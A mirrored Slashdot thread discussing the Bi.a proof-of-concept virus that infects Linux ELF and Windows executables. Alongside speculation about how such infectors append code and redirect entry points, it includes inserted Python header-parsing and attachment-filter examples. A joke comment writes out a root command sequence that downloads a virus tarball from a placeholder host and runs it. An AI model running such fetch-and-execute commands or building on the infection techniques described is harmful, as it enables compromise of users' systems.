Slashdot Mirror


Ambidextrous Linux/Windows Virus

Lam1969 writes "Kaspersky Labs has reported a new proof-of-concept virus that can infect both Windows and Linux systems. It's called Virus.Linux.Bi.a/Virus.Win32.Bi.a and affects ELF binaries and .exe's from windows. SANS has a brief item on the cross-platform virus as well, but no information about a patch or signature yet."

68 of 361 comments

  1. How is it POC? by liliafan · · Score: 4, Interesting
    I guess it is time for me to double check clamav is still updating without any problems on my systems.

    In 2001, the sadmind/ISS worm exploited a hole in Sun Microsystems Inc.'s Solaris to infect systems running vulnerable versions of the operating system. Infected systems then scanned for and attacked servers running Microsoft Corp.'s IIS Web server software. That same year, another proof-of-concept virus named Winux infected both Windows and Linux systems.


    I am curious about how this is a proof-of-concept virus if it has been done before; surely the concept has already been proven?
    --
    GeekServ Unix Consulting Services (http://www.geekserv.com)
    1. Re:How is it POC? by JordanL · · Score: 4, Funny

      I am curious about how this is a proof-of-concept virus if it has been done before; surely the concept has already been proven?

      It wasn't slashdotted last time?

    2. Re:How is it POC? by EndlessNameless · · Score: 5, Informative

      It seems that the reason it's considered a POC at this point is because it has no real payload. All it does is spread, and not nearly as heinously as Blaster/Welchia/Sasser.

      As soon as it gets backdoor or downloader functionality... then it becomes a more serious threat. And really you, me, and the guys at Secunia/SARC/SANS/ISC/etc all know that's where this is headed.

      So yes... in the sense of where this particular piece of malware is headed, this is a proof-of-concept. It's a live test of the propagation mechanism. The payload will be dropped into place soon... probably in the next version since this one looks like it's working fine.

      --
      According to the latest ruleset, this post should be modded as Vorpal Flamebait +5.
    3. Re:How is it POC? by Phillup · · Score: 2, Insightful

      There is however a dangerous situation I can think of: a system running Windows that has access to Linux system binaries through Samba or NFS ...


      If you create a share to one of your binary directories (/usr/bin/) then you deserve what you get.

      Especially if you do it in a way that compromises the fact that only root can write to those files...

      --

      --Phillip

      Can you say BIRTH TAX
    4. Re:How is it POC? by phorm · · Score: 2, Insightful

      And really you, me, and the guys at Secunia/SARC/SANS/ISC/etc all know that's where this is headed.

      Hmm, well in my case it would likely end up being blocked at network level, as my iptables logs its unusual activity. Of course, I don't run as root most times... so the best it could do is create infection in files writable by my user.

      I suppose it *could* try connecting to outside locations to send email or something of the like... assuming it could find a server to connect to (my webmail address book wouldn't exactly be easily sniffable by a virus), but in that case it would have to find a usable host or open-relay to do so anyhow.

      No, linux-capable viruses have been around for awhile, and multi-OS is no more scary than those were.

  2. Netcraft confirms... by Syberghost · · Score: 4, Funny

    ...BSD just coughed up water and started breathing again.

    1. Re:Netcraft confirms... by jlarocco · · Score: 3, Informative
      Think of it - the kernel code is out there - it boots without any system libraries already being loaded. The printk (kernel print function) doesn't call the os at any point - it has enough knowledge to talk to the hardware directly.

      Any real operating system (Windows NT and up, Linux, *BSD, ...) prevents you from doing any of the stuff you mentioned. You can't just load a program and start doing low level IO to ports. You can't just bypass the MMU and paging system and write directly to physical memory. You can't just write directly to video memory. You can't just have your program load and start acting like it's the operating system. Any operating system worthy of being called an operating system prevents that. Device drivers would come closest, but they most definitely need system calls.

      So, do the same, and add enough functionality to read and write to the various filesystems out there, and you're home - you don't even need to do it in assembler ... just #include the appropriate pre-existing header files, and #include any code that you would normally call from a shared library.

      Yeah...okay. For the moment, let's pretend it's possible to directly access the disk and filesystem from a user program, without system calls. To be any use at all as a cross platform virus, the program would need access to NTFS, ext2, FAT32, and ReiserFS. Writing filesystem code isn't trivial. I would be very impressed if a single person could implement any one of those filesystems in a reasonable amount of time, and all 4 would be nothing short of impossible. Let's just say that if somebody had the skill to do it, they'd be too busy making buttloads of money to waste their time.

      #include the appropriate pre-existing header files, and #include any code that you would normally call from a shared library.

      I'd love to hear your explanation on how to do that...

      But, the whole thing is pointless. Even if you did manage to write filesystem support for all the required filesystems and were able to #include the code from the shared libraries the operating system would still stop you the instant you tried to read or write directly to the disk.

  3. I'll beat you to it.. by JavaLord · · Score: 4, Funny

    100 bi jokes to follow

    1. Re:I'll beat you to it.. by zpeterz63 · · Score: 5, Funny

      I'm not so sure...it could go either way.

  4. Whatever by AKAImBatman · · Score: 4, Insightful

    "For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

    Cue ominous thunder. (rolls eyes)

    All this means is that data communications and storage have reached a point in time where no one (in theory) is going to notice that infected files get 3 or 4 megs chunkier. The virus writers still have to find vectors into these systems. If they can't find convenient vectors, then the ability to produce a fat binary is useless.

    What is this need that security researchers have to claim that all systems are equally vulnerable? Are they worried they're going to be out of a job if everyone moves to more secure computing platforms? I mean, really. They should be encouraging mass migrations to other systems, as it diversifies the playing field and theoretically helps everyone remain safer. But I guess that's not their bread and butter.

    1. Re:Whatever by CdBee · · Score: 2, Insightful

      I'll be really impressed when someone comes up with an actual executable binary that contains code to run the appropriate installer on Linux or Windows - a cross-platform version of a Universal Binary

      --
      I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
    2. Re:Whatever by Tim+C · · Score: 4, Funny

      If they can't find convenient vectors, then the ability to produce a fat binary is useless.

      Unfortunately, there's a very convenient vector indeed sat at the keyboard of the vast majority of PCs.

    3. Re:Whatever by gEvil+(beta) · · Score: 3, Funny

      "For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

      Dammit! And I thought using 70s technology would keep me safe from all these modern-day viruses.

      --
      This guy's the limit!
  5. which architectures? by jon787 · · Score: 3, Interesting

    The article says the worm was written in assembly and I assume it means x86 assembly. Can the worm infect non-x86 Linux hosts?

    --
    X(7): A program for managing terminal windows. See also screen(1).
    1. Re:which architectures? by molarmass192 · · Score: 3, Insightful

      I think you answered your own question in a way: if the host has x86 emulation, then why wouldn't it be able to? That said, it's a long way from a POC to a real live virus. I can write a virus today and claim a POC; nobody has ever said that Linux is immune to viruses. Viruses aren't that complicated. That said, an effective (i.e. turn it loose and watch it spread) virus would be very difficult to achieve on Linux precisely because there isn't just one flavor of Linux, running the same binaries, on a single arch ... unlike another well known OS.

      --

      Good people do not need laws to tell them to act responsibly, while bad people will find a way around the laws-Plato
  6. Does this mean.... by da · · Score: 5, Funny

    ... linux is ready for the desktop? [ducks]

    --
    I reserve the right to be wrong.
    1. Re:Does this mean.... by The+Ape+With+No+Name · · Score: 3, Insightful

      No, but it is now ready for proof-of-concept cross-platform FUD.

      --
      Comparing it to Windows will be a moot point, since El Dorado is going to have a 40% larger code base than XP.
  7. Re:Not to worry by GrumblyStuff · · Score: 5, Funny

    Windows users are prepared for viruses...

    What bizarro Earth are you from?

  8. How does it work? by Nazo-San · · Score: 2, Interesting

    I'm kind of curious how it works. You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux. Some of the basics like cout do, but, once you start getting a little more complicated and try to modify files, then it gets tricky. I'm guessing we aren't talking about a Java type thing (supposedly Java has securities in place, though I've never directly tested them -- I do know that it can delete or modify a file though.) They mentioned ELF and Win32 executable binaries, so if it's Java, then that's just a frontend obviously. They wouldn't call it an ambidextrous virus if specific code were written for each OS though, right? The only single thing I can think of is maybe make a system call and run "del so-and-so" which in Linux's case would rely on an alias being in place to actually run rm.

    Could anyone who knows more programming than I do (which, btw, isn't so hard so feel free to hop in here) give me just an idea of how this is even possible?

    You know, suddenly I'm reminded of .hack. In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one, and that one was neither windows nor linux. Ok, it's just a story, but, do you suppose some nut wants to see if they can make this come true in their own way?

    1. Re:How does it work? by martinultima · · Score: 3, Funny
      “In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one”


      So, let's try guessing what the single one is... OpenBSD? :-)

      Virus Writer 1: Hmm, let's see... first we have to crack the unbreakable encryption on the root password...

      Virus Writer 2: No, you idiot! You can't do that until you've found a security vulnerability in the operating system itself!

      1: Well, there is the guy running the machine in the first place...

      2: Yeah, like anyone would install a secure operating system that requires insane amounts of technical experience and just spontaneously fall for some virus scam thing...

      1: I guess you're right then... oh well, back to waiting for another security hole...
      --
      Creative misinterpretation is your friend.
    2. Re:How does it work? by x2A · · Score: 2, Funny

      The linux version comes with WINE ;-)

      When it says 'linux and windows', it will no doubt mean linux-x86, which means that java type code isn't required, as the processor instructions are the same (it's apparently written in assembly code). System calls would have to be done differently, as would inserting the code into an elf/exe file to infect it. One way I guess would be to have different entry points into the code, the linux/windows machines would start running at a different point within the code, but when infecting a new file, it would copy both sections of code into it, rather than just the bit that's running. You could in theory make a virus that will spread to many more systems, but each one makes the resulting virus larger.

      --
      The revolution will not be televised... but it will have a page on Wikipedia
    3. Re:How does it work? by alexhs · · Score: 2, Interesting

      I will give two possibilities:
      1. "universal binary": compile code for each platform you want to infect. That one might even work on other architectures.

      Code needs:
      a. an algorithm to know which OS/arch an executable is for (and needs to know if a file is an executable in the first place)
      b. an algorithm to link the appropriate code part.

      You have a Win/x86 trojan. It checks for files and finds a PowerPC/Linux ELF. It adds itself to the end of the file, finds a jump in the original code, reroutes it to the PowerPC/Linux part of the virus code. At the end of the virus code, it does the appropriate jump so the original program still works.

      2. check for syscalls:
      IA32 code (usually named x86) remains IA32 code, whatever your OS is. The biggest difference lies in syscalls.
      Have generic code (without syscalls) checking what OS is running and set, say, CurrentOS. Each time you need a syscall, do a switch(CurrentOS) and execute the appropriate syscall.

      --
      I have discovered a truly marvelous proof of killer sig, which this margin is too narrow to contain.
  9. I, for one by sprag · · Score: 4, Funny

    welcome our new cross-platform proof-of-concept viral overlords.

    It's almost like playing buzzword bingo.

  10. Reactions: by Guppy06 · · Score: 4, Insightful
    1. Linux and Win32? W00t, my WfW3.11 box is invincible!
    2. So... why can't application developers do this?
    1. Re:Reactions: by redalien · · Score: 2, Funny

      It was called Win32S, and actually worked amazingly well. I only ever had 1 programme not work, and that was a quiz programme called "You don't know Jack". This americanism confused me greatly, and I was very annoyed that I couldn't run it and find out who Jack was.

  11. Limited to ASM? by neoshroom · · Score: 2, Insightful

    "Writing a cross-platform worm is difficult because it limits you to functions that are available on both operating systems," Ullrich said. "You have to also code the virus in assembly to make it work without relying on any OS-specific function," he said.

    This isn't actually quite true; it is merely one way of doing so. You could easily write a virus that uses tons of API and platform specific stuff, but contains a generic detection mechanism at the beginning of its execution and then forks between two pieces of code. One portion contains code specific to Windows and another code specific to Linux. Apart from the generic platform discovery code upon execution it would be like any other platform specific virus. I'm actually surprised this is the first, at least publicized, detection of such a virus.

    __
    Write My Essay

    --
    Big apple, new Yorik, undig it, something's unrotting in Edenmark.
    1. Re:Limited to ASM? by x2A · · Score: 4, Informative

      It's not the first, I recall one before. And you don't even need detection code, you just write a different entry point address into the elf header as you would the exe header. You can have two different payloads, and two different copy mechanisms, as long as both copy both, not just themselves. In fact, there's no reason to stick to just 2. You can have a single virus that spreads across platforms/architectures, it just makes it bigger and easier to spot.

      --
      The revolution will not be televised... but it will have a page on Wikipedia
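      The two checks alexhs lists above (is this file an executable at all, and for which OS and architecture) and the per-format entry-point field x2A mentions come down to reading a few header fields. The following is an added example, not code from the article, from Kaspersky or SANS, or from either poster: it parses ELF and PE headers that are constructed inline (not real binaries), and reports format, architecture and the address execution starts at, which is the first thing a multi-target infector, or a scanner looking for one, has to work out. The architecture tables are the standard e_machine and IMAGE_FILE_MACHINE values; the sample entry addresses are made up.

```python
"""Classify an executable image by format and target, and read its entry point.

Added example for this thread, not code from the article or from the posters.
Sample headers below are constructed here, not taken from real binaries.
"""
import struct
from dataclasses import dataclass
from typing import Optional

# ELF e_machine and PE IMAGE_FILE_MACHINE values for the targets the thread mentions
ELF_MACHINES = {3: "x86", 62: "x86-64", 20: "ppc", 21: "ppc64", 40: "arm", 183: "aarch64"}
PE_MACHINES = {0x14C: "x86", 0x8664: "x86-64", 0x1C0: "arm", 0xAA64: "aarch64", 0x1F0: "ppc"}


@dataclass(frozen=True)
class Target:
    fmt: str    # "elf" or "pe"
    arch: str   # architecture name, or "unknown(<n>)"
    bits: int   # 32 or 64
    entry: int  # virtual address execution starts at


def parse_elf(data: bytes) -> Optional[Target]:
    """Read class, byte order, machine and e_entry from an ELF header."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None                      # malformed class/data byte
    end = "<" if ei_data == 1 else ">"   # ELF fields follow EI_DATA byte order
    e_machine = struct.unpack_from(end + "H", data, 18)[0]
    if ei_class == 2:                    # ELF64: e_entry is 8 bytes at offset 24
        if len(data) < 64:
            return None
        bits, entry = 64, struct.unpack_from(end + "Q", data, 24)[0]
    else:                                # ELF32: e_entry is 4 bytes at offset 24
        bits, entry = 32, struct.unpack_from(end + "I", data, 24)[0]
    return Target("elf", ELF_MACHINES.get(e_machine, f"unknown({e_machine})"), bits, entry)


def parse_pe(data: bytes) -> Optional[Target]:
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> COFF -> optional header for the entry RVA."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 + 20 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None                      # truncated or not a PE image
    coff = e_lfanew + 4
    machine, _nsect, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 32 or opt + opt_size > len(data):
        return None
    magic = struct.unpack_from("<H", data, opt)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    if magic == 0x10B:                   # PE32: ImageBase is 4 bytes at +28
        bits, image_base = 32, struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                 # PE32+: ImageBase is 8 bytes at +24
        bits, image_base = 64, struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        return None
    return Target("pe", PE_MACHINES.get(machine, f"unknown({machine:#x})"), bits, image_base + entry_rva)


def identify(data: bytes) -> Optional[Target]:
    """Return format/arch/entry of an image, or None when it is neither ELF nor PE."""
    return parse_elf(data) or parse_pe(data)


# --- constructed sample headers (hypothetical values, not real programs) ---
def _elf_header(bits: int, big_endian: bool, machine: int, entry: int) -> bytes:
    end = ">" if big_endian else "<"
    ident = b"\x7fELF" + bytes([2 if bits == 64 else 1, 2 if big_endian else 1, 1, 0]) + b"\0" * 8
    if bits == 64:
        body = struct.pack(end + "HHIQQQIHHHHHH", 2, machine, 1, entry, 64, 0, 0, 64, 56, 0, 64, 0, 0)
    else:
        body = struct.pack(end + "HHIIIIIHHHHHH", 2, machine, 1, entry, 52, 0, 0, 52, 32, 0, 40, 0, 0)
    return ident + body


def _pe_header(plus: bool, machine: int, image_base: int, entry_rva: int) -> bytes:
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 32, 0x22)  # 32-byte (cut down) optional header
    if plus:
        opt = struct.pack("<HBBIIIIIQ", 0x20B, 14, 0, 0, 0, 0, entry_rva, 0x1000, image_base)
    else:
        opt = struct.pack("<HBBIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0x2000, image_base)
    return dos + b"PE\0\0" + coff + opt


SAMPLES = {
    "linux-x86-64": _elf_header(64, False, 62, 0x401000),
    "linux-ppc32": _elf_header(32, True, 20, 0x10000400),     # big-endian, as PowerPC ELF is
    "windows-x86-64": _pe_header(True, 0x8664, 0x140000000, 0x1234),
    "windows-x86": _pe_header(False, 0x14C, 0x400000, 0x1000),
    "png": b"\x89PNG\r\n\x1a\n" + b"\0" * 120,                # not an executable at all
}


def dispatch_table(samples=SAMPLES) -> dict:
    """Map each sample to the code part a multi-target infector would need for it
    (None when the file is not something it could infect), i.e. step (a) and (b) above."""
    out = {}
    for name, data in samples.items():
        t = identify(data)
        out[name] = None if t is None else f"{t.fmt}/{t.arch}"
    return out


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:16} -> {identify(data)}")
```

      Note that the PE entry is an RVA that only becomes an address once ImageBase is added (and may be relocated at load time), while the ELF e_entry is already a virtual address; an infector that simply overwrites either with a pointer to its own appended code produces exactly the signature-friendly change x2A says makes such a virus "easier to spot".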
  12. Re:Not to worry by Rosco+P.+Coltrane · · Score: 5, Informative

    Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

    Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of. The reason Linux users don't sweat is because flaws are spotted quickly by many people who read the code, and fixed quickly too. That and people who code open-source tend to produce good code, as a matter of pride.

    Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
  13. Took long enough... by Eric+Damron · · Score: 5, Funny

    Well it's about time! Finally inter-platform operability.

    --
    The race isn't always to the swift... but that's the way to bet!
  14. Wrong and right. by khasim · · Score: 2, Insightful
    Windows users are prepared for viruses...
    Sure they are.
    ...and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.
    Pretty much.

    Remember, it isn't about whether a virus exists for a specific platform or not.

    It's whether you'll be infected or not.

    And that is based upon the infection rate vs the removal rate. A virus that cannot spread faster than it is being removed will die.

    Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.
    1. Re:Wrong and right. by heinousjay · · Score: 2

      Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.

      To be fair, most Unixish system developers made a number of poor decisions usage-wise in pursuit of "secure" systems.

      OS X seems to be the closest to blending the worlds, although it has some interesting foibles all its own. I look forward to the next ten years, because I think everyone is starting to get it all the way around. Uncharacteristically, I'm pretty damn optimistic.

      --
      Slashdot - where whining about luck is the new way to make the world you want.
  15. Re:Not to worry by sbrown123 · · Score: 2, Informative

    Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

    Actually most people run with the version of Windows that came installed on their computer. And these accounts are, from the best of my knowledge, always Admin.

  16. Symantec by rmsmith · · Score: 5, Interesting

    I find it interesting that this 'virus' appears shortly after Symantec reportedly gets cushy with the Linux press.

  17. Writing viruses for Linux is EASY. Getting them.. by Anonymous Coward · · Score: 3, Insightful

    ..to spread is the hard part.

    How to write a Linux virus.
    http://virus.enemy.org/virus-writing-HOWTO/_html/index.html

    There are numerous reasons why this is true.
    Reasons include:
    GNU/Linux is a minority platform.
    GNU/Linux is highly fragmented.
    GNU/Linux security is refined and updated often.
    GNU/Linux users are more educated.
    Windows has numerous security design flaws that promote viruses, that GNU/Linux systems don't have.
    Windows has numerous user interface design flaws that promote viruses, that GNU/Linux doesn't have.

    Although this WILL CHANGE if certain Pro-GUI factions get their way.

    Like having Gnome and KDE user interfaces ignore the traditional Unix permissions for certain types of files... http://thread.gmane.org/gmane.linux.xdg.devel/7014

    Damn stupid shit.

    But as it stands now a combination of social and technical issues keeps Linux users safe.

    One example of a flaw in Windows that causes easy transmission of viruses... Executable files are based on their file names, not based on a permission model.

    And it's not just 'exe' or 'bat'.. Here is a partial list of executable file extensions in Windows.
    ADE - Microsoft Access Project Extension
    ADP - Microsoft Access Project
    BAS - Visual Basic Class Module
    BAT - Batch File
    CHM - Compiled HTML Help File
    CMD - Windows NT Command Script
    COM - MS-DOS Application
    CPL - Control Panel Extension
    CRT - Security Certificate
    DLL - Dynamic Link Library
    DO* - Word Documents and Templates
    EXE - Application
    HLP - Windows Help File
    HTA - HTML Applications
    INF - Setup Information File
    INS - Internet Communication Settings
    ISP - Internet Communication Settings
    JS - JScript File
    JSE - JScript Encoded Script File
    LNK - Shortcut
    MDB - Microsoft Access Application
    MDE - Microsoft Access MDE Database
    MSC - Microsoft Common Console Document
    MSI - Windows Installer Package
    MSP - Windows Installer Patch
    MST - Visual Test Source File
    OCX - ActiveX Objects
    PCD - Photo CD Image
    PIF - Shortcut to MS-DOS Program
    POT - PowerPoint Templates
    PPT - PowerPoint Files
    REG - Registration Entries
    SCR - Screen Saver
    SCT - Windows Script Component
    SHB - Document Shortcut File
    SHS - Shell Scrap Object
    SYS - System Config/Driver
    URL - Internet Shortcut (Uniform Resource Locator)
    VB - VBScript File
    VBE - VBScript Encoded Script File
    VBS - VBScript Script File
    WSC - Windows Script Component
    WSF - Windows Script File
    WSH - Windows Scripting Host Settings File
    XL* - Excel Files and Templates

    Good luck training users not to use those. And the fact that you can launch executable programs by double clicking email attachments is another huge shitfest of bad designs.
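    Since the comment's point is that Windows decides "executable" from the file name, the name is also what a mail gateway or attachment filter gets to work with. The block below is an added example, not code from the article or from the comment's author: it turns the extension list above into a classifier and adds the two things a practitioner would want on top of a plain lookup, namely the double-extension disguise of the grandchild.jpg.exe kind discussed later in this thread, and the trailing dot/space stripping the Win32 path layer performs before a name is used. The DO*/XL* wildcard entries are handled as prefix families. Sample names are constructed.

```python
"""Flag attachment names that Windows would launch as a program.

Added example for this thread, not code from the article or from the comment's
author. Extension list as given in the comment; sample names are constructed.
"""
from typing import Dict, Iterable

EXECUTABLE_EXTENSIONS = {
    "ade", "adp", "bas", "bat", "chm", "cmd", "com", "cpl", "crt", "dll", "exe", "hlp",
    "hta", "inf", "ins", "isp", "js", "jse", "lnk", "mdb", "mde", "msc", "msi", "msp",
    "mst", "ocx", "pcd", "pif", "pot", "ppt", "reg", "scr", "sct", "shb", "shs", "sys",
    "url", "vb", "vbe", "vbs", "wsc", "wsf", "wsh",
}
# The comment's wildcard entries: DO* (Word documents/templates) and XL* (Excel)
MACRO_FAMILIES = ("do", "xl")
# Extensions a user reads as "just a picture/document"; used to spot disguises
HARMLESS_LOOKING = {"jpg", "jpeg", "gif", "png", "bmp", "txt", "pdf", "zip", "mp3", "avi"}


def _final_component(name: str) -> str:
    """Last path component with the trailing dots/spaces Windows discards removed."""
    return name.replace("\\", "/").rsplit("/", 1)[-1].rstrip(" .")


def windows_extension(name: str) -> str:
    """Extension Windows would act on, lower-cased, or '' if there is none.

    'photo.jpg.scr ' is opened as 'photo.jpg.scr', so the trailing space must
    not hide the .scr; matching is case-insensitive like the shell's.
    """
    base = _final_component(name)
    if "." not in base:
        return ""
    return base.rsplit(".", 1)[1].lower()


def is_executable_name(name: str) -> bool:
    """True when the shell would run this file rather than open it as data."""
    ext = windows_extension(name)
    return ext in EXECUTABLE_EXTENSIONS or ext.startswith(MACRO_FAMILIES)


def is_disguised(name: str) -> bool:
    """True for an executable whose preceding extension looks like harmless data."""
    parts = _final_component(name).lower().split(".")
    return len(parts) >= 3 and is_executable_name(name) and parts[-2] in HARMLESS_LOOKING


def triage(names: Iterable[str]) -> Dict[str, str]:
    """Classify each attachment name the way a gateway filter would."""
    verdicts = {}
    for name in names:
        if is_disguised(name):
            verdicts[name] = "block: executable disguised as data"
        elif is_executable_name(name):
            verdicts[name] = "block: executable"
        else:
            verdicts[name] = "allow"
    return verdicts


# Constructed sample names, including a trailing space, a trailing dot and a full path
SAMPLE_NAMES = [
    "grandchild.jpg.exe", "report.PDF", "invoice.pdf.scr ", "setup.EXE",
    "README", "budget.xlsm", "notes.txt.", "C:\\temp\\holiday.gif.pif",
]

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_NAMES).items():
        print(f"{name!r:32} {verdict}")
```

    Name-based filtering is only a first gate: it says nothing about what is inside a file, and a .zip or a document with macros passes it, which is why the content scanner (the ClamAV signature update mentioned near the top of the thread) still has to run behind it.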

  18. Re:Not to worry by GrumblyStuff · · Score: 2, Funny

    Sure they are. Here's the link.

    H4WT P1CS V1RU5 PR0T3CTION CLICK H3RE

  19. Re:How is it distributed? by adnonsense · · Score: 5, Funny

    I have reverse-engineered the virus and discovered an insidious distribution mechanism:

    root# wget http://warez.example.com/Virus.Linux.Bi.a.tgz
    root# tar xzf Virus.Linux.Bi.a.tgz
    root# cd Virus.Linux.Bi.a
    root# ./configure --prefix=/usr/local/virii --with-natalie-portman=hot-grits --with-beowulf-cluster=yes
    root# make && make install
    root# PATH=$PATH:/usr/local/virii/bin
    root# rehash
    root# pwn3d &
  20. Re:Not to worry by halcyon1234 · · Score: 2, Informative
    Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

    Yes and no. It isn't so much that Linux is a more secure operating system (an argument I won't touch with a 1010 foot pole). It is more that Linux is a more diverse operating system.

    If I run Windows XP (perish the thought), and 1000 other people run Windows XP, we are all running the same operating system. Except for a patch or two, we are running the same code with the same holes. A virus that hits one hits us all.

    Now, if I run Linux, and 1000 other people run Linux-- well, we aren't all running exactly the same OS. Red Hat, SuSE, live CDs, home brews-- each and every one is slightly different. Top that off with different modules, services, etc running-- and you effectively have a large number of different operating systems. If a malware exists that uses an exploit to propagate, chances are that it isn't going to hit all 1000 of us.

    And yes, I know there's a distinction between a virus, a trojan horse, and a worm. But for the sake of argument, the malware I'm talking about is self-propagating and self-executing in some way. Anyone can write a shell script that does rm -rf / and trick at least a couple people into running it.

    The real vector that should be a concern for Linux users are cross-platform shares. Let's say you make your Linux box as secure as possible. No holes in any of the services, etc. Well, if you are on a mixed-OS network, and you Samba a Windows drive that is infected-- then you run the risk of being infected. Linux is just as vulnerable as Windows to malware once it has already been executed. So it is much easier to buffer overload the Windows box, and hope the virus gets Samba'd over to a Linux box.

    Either that, or we all unplug from the net, power down, and encase our boxes in cement. 100% virus protection (though it would classify as a denial of service...)

  21. Re:Not to worry by RzUpAnmsCwrds · · Score: 4, Insightful

    it is because system design makes their impact minimal

    Deleting everything in my home directory is anything but minimal.

    Potentially exploiting local privilege elevation exploits to get root is anything but minimal.

    Infecting software after it has been compiled is anything but minimal.

    Using social engineering to get root is anything but minimal. How many users do you know who would enter their superuser password to "get free screensavers"? Too many.

    Pretending that you're protected by design from the problem indicates that you don't understand how viruses really work. Guess what? You can run as a non-root user in Windows, too. But you can still do a ton of damage as a normal user. Spam relays and DDoS botnets don't need root access, just the ability to send data over the network. How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools? How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?

    This is the real world. Attackers are smart, they are motivated by profit (because of the spambot racket), and they have plenty of time to find the next buffer overrun.

  22. No problem... by mogrify · · Score: 3, Funny

    I'm just recompiling my kernel without support for ELF binaries. Just a quick reboot, and I'

    --
    perl -e 'foreach(values %SIG){$_="IGNORE";}while(){}'
  23. My PET? by dbc · · Score: 2, Funny
    "For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

    Woah, not my Commodore PET (Personal Electronic Transactor)? Nooooo..... I *love* that chicklet keyboard. And the awesome monochrome graphics. They have the playing card suits built in as *characters*, mind you. You can 1000 PRINT them in the built in BASIC!

    Let me tell you, though, it was a bitch getting an entire TCP/IP stack working in the 4K of RAM and still have room for a web browser. And don't even get me started on how hard it was to get 100BaseT working over the expansion port.

    Guess it's finally time to retire the old PET.

  24. How About a Story? by Einstein_101 · · Score: 3, Insightful

    Here's a quick anecdote for you:

    About a week ago, for various reasons, I decided to format my laptop and put Windows XP Professional on there. I previously had Slackware Linux 10.2 installed, but since my desktop has been dual-booting for a while, I figured I might as well get my money's worth and put Windows on the laptop (Linux also doesn't support the SD card reader, but that's another story). The installation went nicely, and I continued to do the tedious tasks that you do after a format. (validate windows, download patches, install drivers and apps, etc...) I installed a second user account for administrative uses and named it "Root".

    I logged into my "Root" account, and installed Chessmaster 9000. When I logged back into my regular user account, the game wouldn't start. After a while, it dawned on me that Chessmaster installs the bulk of the data in your My Documents folder. So I uninstalled it, then tried to install it under my user's account. Now, if you're trying to install a program, and you're not the Administrator, a simple dialog will pop up and prompt you for the password. However when the install finished, the program wouldn't start. Since I installed as Administrator (I had no choice), the data was stored in the Administrator's My Documents folder. I tried to link to it - I even tried to install as Administrator, and put a link to his folder (and changing permissions) in the default folder so all users would use it.

    Nothing worked properly. I ended up having to change my user account back to Administrator privileges, install the program, then change it back. And this is just for Chessmaster. Other programs are even worse. Doom 3, FarCry, and Call of Duty all install their data in the Program Files folder. So in order to play the game without being root, you have to change the permissions on the saved games folder.

    The point of the story is this: Linux doesn't have the problems that Windows has, because it's more secure by design - not by luck. A significant amount of programs are designed for the user to have Administrator access, and assume that you will always run with such permissions. Windows didn't switch the masses to the NT design until XP, which was released 4th Quarter 2001. As a result, you have generations of programs that assume they can read/write whatever and wherever they want - leaving a mess for the end user to sort out. In the end, they'll just say to hell with it and run as Administrator.

    (And that's not even addressing the masses that bought OEM PCs that run XP Home with Administrator privileges by default)

  25. Re:Not to worry by Creepy · · Score: 3, Insightful

    Yeah, but even people that know about the "normal" user accounts quickly discover that almost all software written for windows doesn't handle non-admin accounts well. Ever try to install a program just in user space on Windows? If it works at all, you're lucky, and that isn't even scratching the surface of the problems. Got a network password? You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user. Do you have any idea what a MASSIVE pain in the ass that is, especially when I have 20-30 windows open (many are Exceed based X sessions) and am trying to get work done? After 2 months of that and multiple programs that plain wouldn't work if they weren't running as an admin user, I switched back to running exclusively as an admin on Windows.

  26. Re:Not to worry by shaitand · · Score: 2, Informative

    "Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of."

    Actually that is pretty much in line with what I have said and does not make me wrong at all.

    The system design and development model has led to two things, a shortage of privilege escalation flaws (flaws isn't good enough, they have to allow a user account to gain root under conditions the virus can create) and a short lifespan of any such flaws that exist.

